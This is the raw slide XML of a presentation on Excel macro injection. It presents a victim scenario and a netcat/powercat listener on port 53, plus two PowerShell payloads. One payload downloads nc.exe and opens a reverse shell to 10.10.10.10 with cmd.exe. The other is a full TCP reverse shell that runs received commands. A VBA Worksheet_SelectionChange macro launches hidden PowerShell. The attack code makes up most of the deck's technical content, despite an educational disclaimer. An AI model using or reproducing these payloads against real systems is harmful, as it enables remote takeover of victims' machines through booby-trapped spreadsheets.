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6" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="267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 showGuides="1"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43D2-D04B-4F20-A179-B81BA395ADE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07F43-6A6F-4064-A81F-89FDA00A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252C6-51D0-411B-9772-44AC401A360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3259-423D-457B-BEA4-391F17B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B83CA0E-53A1-405B-9910-DE285489AE9F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598003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Macro Injection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n|u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Dubai</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28512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https://github.com/AamerShah/TCP-tunnel-RCE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3" descr="AamerShah/TCP-tunnel-RCE: Excel induced macro cod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1" y="2590800"/>
            <a:ext cx="5867400" cy="32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Aamer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t> Shah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>Twitter.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1"/>
              <a:t>Aamer_Sha</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>1@aamershah.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="6600" dirty="0"/>
          </a:p>
          <a:p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2178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nc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>System Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Attacker Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Victim Machine</a:t>
            </a:r>
          </a:p>
          <a:p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Know-How</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21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2860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will not answer your questions which specifically target a corporation/organization.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take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>otes|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ictures|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ideos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>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Research and educational purposes only.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139949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38400"/>
            <a:ext cx="1625397" cy="16253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81098"/>
            <a:ext cx="1447800" cy="114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40637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Listening on port 53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647" y="4060561"/>
            <a:ext cx="28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Victim executing the code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8" r="43998" b="10250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2482333"/>
            <a:ext cx="824054" cy="153752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498127" y="4572000"/>
            <a:ext cx="1447800" cy="266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08" y="4248463"/>
            <a:ext cx="924038" cy="924038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0800000">
            <a:off x="3498127" y="5638801"/>
            <a:ext cx="1447800" cy="266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15" y="5356735"/>
            <a:ext cx="725939" cy="8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38400"/>
            <a:ext cx="1625397" cy="16253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81098"/>
            <a:ext cx="1447800" cy="114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40637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Listening on port 53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647" y="4060561"/>
            <a:ext cx="28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Victim executing the code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8" r="43998" b="10250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2482333"/>
            <a:ext cx="824054" cy="153752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0800000">
            <a:off x="2286000" y="3098697"/>
            <a:ext cx="4343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647" y="4539734"/>
            <a:ext cx="2844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♦ Opened the excel file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>♦ Opened an unknown link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>♦ Installed a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>binded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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724400"/>
            <a:ext cx="346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♦ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>♦ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powercat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –l –p 53 -v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98" y="2419662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$down = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AamerShah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/TCP-tunnel-RCE/blob/master/nc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$file = 'nc.exe';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>down.DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>,$file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$z=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>gci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> C:\Users -Filter nc.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Recurse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> | % { $_.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>FullName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> } | Select-Object -first 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$z=Split-Path $z -Parent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> $z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>.\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 10.10.10.10 53 -e cmd.exe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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20149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$client = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>System.Net.Sockets.TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.10.10.10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>53</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>);$stream = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>client.GetStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>();[byte[]]$bytes = 0..255|%{0};while(($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>stream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($bytes, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bytes.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)) -ne 0){;$data = (New-Object -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>TypeName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>System.Text.ASCIIEncoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>GetString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($bytes,0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sendback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> $data 2&gt;&amp;1 | Out-String );$sendback2 = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sendback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> " + (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>).Path + "&gt; ";$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sendbyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> = ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>text.encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>]::ASCII).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>GetBytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($sendback2);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>stream.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>($sendbyte,0,$sendbyte.Length)}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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23495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Private Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Worksheet_SelectionChange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ByVal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Target As Range)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Call Shell("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>noexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> "“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>""", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>vbHide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End Sub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35880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</TotalTime>
  <Words>365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Tahoma</vt:lpstr>
      <vt:lpstr>Tunga</vt:lpstr>
      <vt:lpstr>BlackTie</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>Technical Know-How</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>Scenario</vt:lpstr>
      <vt:lpstr>Scenario</vt:lpstr>
      <vt:lpstr>Payload 1</vt:lpstr>
      <vt:lpstr>Payload 2</vt:lpstr>
      <vt:lpstr>Macro Code</vt:lpstr>
      <vt:lpstr>References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Syed Aamer (623)</dc:creator>
  <cp:lastModifiedBy>Spec Off</cp:lastModifiedBy>
  <cp:revision>49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-08-30T08:49:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-28T09:51:29Z</dcterms:modified>
</cp:coreProperties>
</file>